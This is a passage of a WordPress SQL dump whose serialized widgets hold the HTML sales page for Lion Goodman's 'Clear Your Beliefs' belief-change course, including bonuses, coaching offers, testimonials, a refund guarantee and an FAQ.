alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>” \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. \n\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<ul class="icon_box-ul">\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\n	<li><strong>Optional:</strong> Professional Coaching Sessions.</li>\n</ul>\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<div style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<div class="parg-text"><p><strong>Q: What is a virtual course?</strong></p>\n\n<div class="parg-text"><p>A: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.</p>\n\n<div class="parg-text"><p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<div class="parg-text"><p><strong>Q: How long will I have access to the course?</strong></p>\n\n<div class="parg-text"><p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<div class="parg-text"><p><strong>Q: Are there scholarships available?</strong></p>\n\n<div class="parg-text"><p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">info@clearyourbeliefs.com</a></font>, with a description of your circumstances and your offer of what you can pay.</p>\n\n<div class="parg-text"><p><strong>Q: What is your refund policy?</strong></p>\n\n<div class="parg-text"><p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<div class="parg-text"><p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<div class="parg-text"><p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. We’ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<div class="parg-text"><p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<div class="parg-text"><p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" ><FONT COLOR="#2E2EFE">ClearYourBeliefs.com</a></font>, <a href="http://www.BeliefCloset.com" target="_blank" ><FONT COLOR="#2E2EFE">BeliefCloset.com</a></font>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" ><FONT COLOR="#2E2EFE">ConfusedAboutLove.com.</a></font></p>\n\n<div class="parg-text"><p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<div class="parg-text"><p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\n// ]]></script>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"20";s:4:"cell";s:1:"0";s:2:"id";s:2:"26";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:21:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"2";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"3";}i:7;a:1:{s:5:"cells";s:1:"1";}i:8;a:1:{s:5:"cells";s:1:"1";}i:9;a:1:{s:5:"cells";s:1:"1";}i:10;a:1:{s:5:"cells";s:1:"1";}i:11;a:1:{s:5:"cells";s:1:"2";}i:12;a:1:{s:5:"cells";s:1:"1";}i:13;a:1:{s:5:"cells";s:1:"1";}i:14;a:1:{s:5:"cells";s:1:"1";}i:15;a:1:{s:5:"cells";s:1:"1";}i:16;a:1:{s:5:"cells";s:1:"1";}i:17;a:1:{s:5:"cells";s:1:"1";}i:18;a:1:{s:5:"cells";s:1:"1";}i:19;a:1:{s:5:"cells";s:1:"1";}i:20;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:27:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.5984943538268507";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:10;a:2:{s:6:"weight";s:18:"0.8996235884567128";s:4:"grid";s:1:"6";}i:11;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:12;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}i:13;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"8";}i:14;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"9";}i:15;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"10";}i:16;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:2:"11";}i:17;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:2:"11";}i:18;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"12";}i:19;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"13";}i:20;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"14";}i:21;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"15";}i:22;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"16";}i:23;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"17";}i:24;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"18";}i:25;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"19";}i:26;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"20";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1610, 2045, 'panels_data', 'a:3:{s:7:"widgets";a:27:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:650:"<div class="quot custo-quot" style="margin-top: 0px; text-align: center;">\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:95:"<div class="parg-title"><h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:483:"<div class="parg-text"><p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:183:"<div class="parg-img"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"1";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:5:"title";s:0:"";s:4:"text";s:132:"<div class="parg-title"><h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:14:"WP_Widget_Text";}}i:6;a:4:{s:5:"title";s:0:"";s:4:"text";s:322:"<div class="parg-text"><p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:14:"WP_Widget_Text";}}i:7;a:4:{s:5:"title";s:0:"";s:4:"text";s:277:"<div class="parg-text"><p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:14:"WP_Widget_Text";}}i:8;a:4:{s:5:"title";s:16:"Ok I''m convinced";s:4:"text";s:238:"<center><a class="button first" href="http://clearyourbeliefs.com/program/#package">OK, I''M CONVINCED!<br />Take me to the program description,<br />tell me about all the cool bonuses I’ll get,<br />and how much it costs...</a></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"1";s:2:"id";s:1:"8";s:5:"class";s:14:"WP_Widget_Text";}}i:9;a:4:{s:5:"title";s:0:"";s:4:"text";s:61:"<div class="parg-title"><h1>\nWhy Does This Happen?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:14:"WP_Widget_Text";}}i:10;a:4:{s:5:"title";s:0:"";s:4:"text";s:833:"<div class="parg-img pull-left"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:2:"10";s:5:"class";s:14:"WP_Widget_Text";}}i:11;a:4:{s:5:"title";s:0:"";s:4:"text";s:97:"<div class="parg-title"><h1>To Make Real Change, You Have To Get To The Root of Things</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"11";s:5:"class";s:14:"WP_Widget_Text";}}i:12;a:4:{s:5:"title";s:0:"";s:4:"text";s:302:"<div class="parg-text"><p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"12";s:5:"class";s:14:"WP_Widget_Text";}}i:13;a:4:{s:5:"title";s:0:"";s:4:"text";s:225:"<div class="parg-text"><p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"0";s:2:"id";s:2:"13";s:5:"class";s:14:"WP_Widget_Text";}}i:14;a:3:{s:3:"src";s:74:"http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg";s:4:"href";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"1";s:2:"id";s:2:"14";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}i:15;a:4:{s:5:"title";s:0:"";s:4:"text";s:84:"<div class="parg-title"><h1>Beliefs Are The Foundation Of Your Experience</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"15";s:5:"class";s:14:"WP_Widget_Text";}}i:16;a:4:{s:5:"title";s:0:"";s:4:"text";s:515:"<div class="parg-text"><p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"16";s:5:"class";s:14:"WP_Widget_Text";}}i:17;a:4:{s:5:"title";s:0:"";s:4:"text";s:0:"";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"17";s:5:"class";s:14:"WP_Widget_Text";}}i:18;a:4:{s:5:"title";s:0:"";s:4:"text";s:1001:"<div class="parg-img"><img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally <u>create our reality</u> with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"14";s:4:"cell";s:1:"0";s:2:"id";s:2:"18";s:5:"class";s:14:"WP_Widget_Text";}}i:19;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"<div class="parg-title"><h1>Upgrade Your Human Operating 